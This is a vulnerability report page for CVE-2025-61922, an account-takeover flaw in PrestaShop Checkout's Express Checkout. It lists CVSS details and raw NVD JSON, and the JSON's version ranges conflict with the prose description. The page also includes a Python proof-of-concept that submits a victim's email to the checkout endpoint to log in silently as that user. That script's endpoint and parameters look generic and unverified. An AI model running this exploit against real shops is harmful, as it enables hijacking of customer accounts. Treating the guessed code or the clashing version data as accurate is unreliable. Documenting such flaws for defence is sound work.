Security Vulnerability Report
CVE-2025-61922 CVSS 9.1 CRITICAL

CVE-2025-61922

Published: 2025-10-16 18:15:39
Last Modified: 2025-12-29 20:06:13

Description

PrestaShop Checkout is the PrestaShop official payment module in partnership with PayPal. Starting in version 1.3.0 and prior to versions 4.4.1 and 5.0.5, missing validation on the Express Checkout feature allows silent login, enabling account takeover via email. The vulnerability is fixed in versions 4.4.1 and 5.0.5. No known workarounds exist.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:* - VULNERABLE
cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:* - VULNERABLE
cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:* - VULNERABLE
cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:* - VULNERABLE
cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:* - VULNERABLE
PrestaShop Checkout >= 1.3.0
PrestaShop Checkout < 4.4.1
PrestaShop Checkout 5.0.0 - < 5.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61922 PoC - PrestaShop Checkout Silent Login / Account Takeover
# Vulnerability: Missing validation on Express Checkout feature allows silent login
import requests

TARGET_URL = "https://target-prestashop-site.com"
VICTIM_EMAIL = "[email protected]"

# Step 1: Initiate Express Checkout session
session = requests.Session()

# Step 2: Access the checkout page to obtain necessary tokens
express_checkout_url = f"{TARGET_URL}/module/ps_checkout/expressCheckout"
response = session.get(express_checkout_url)

# Step 3: Trigger Express Checkout with victim's email address
# The missing validation allows the attacker to impersonate the victim
payload = {
    "email": VICTIM_EMAIL,
    "action": "expressCheckout",
    "checkoutType": "EXPRESS"
}

# Step 4: Submit the request to silently log in as the victim
response = session.post(
    f"{TARGET_URL}/module/ps_checkout/expressCheckout",
    data=payload
)

# Step 5: Verify account takeover by accessing account page
account_response = session.get(f"{TARGET_URL}/my-account")
if "My Account" in account_response.text and VICTIM_EMAIL in account_response.text:
    print(f"[+] Successfully took over account: {VICTIM_EMAIL}")
else:
    print("[-] Exploit failed")
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-61922", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:38.597", "lastModified": "2025-12-29T20:06:13.033", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PrestaShop Checkout is the PrestaShop official payment module in partnership with PayPal. Starting in version 1.3.0 and prior to versions 4.4.1 and 5.0.5, missing validation on the Express Checkout feature allows silent login, enabling account takeover via email. The vulnerability is fixed in versions 4.4.1 and 5.0.5. No known workarounds exist."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "1.3.0", "versionEndExcluding": "7.4.4.1", "matchCriteriaId": "78BDECB6-6142-47A0-89D1-C96DE8B052EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "7.5.0.1", "versionEndExcluding": "7.5.0.5", "matchCriteriaId": "36D48F64-2C0D-4DF7-9FBB-26FF21B9C71B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.4.4.1", "matchCriteriaId": "78BB8AD6-68E4-426F-B9D9-1810D37193D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "8.5.0.0", "versionEndExcluding": "8.5.0.5", "matchCriteriaId": "CF84DA7C-A801-4366-8463-F6FD21A69263"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "9.4.3.1", "versionEndExcluding": "9.5.0.5", "matchCriteriaId": "FBB531A1-D85B-4987-89FB-EC28C974301F"}]}]}], "references": [{"url": "https://github.com/PrestaShopCorp/ps_checkout/security/advisories/GHSA-54hq-mf6h-48xh", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
```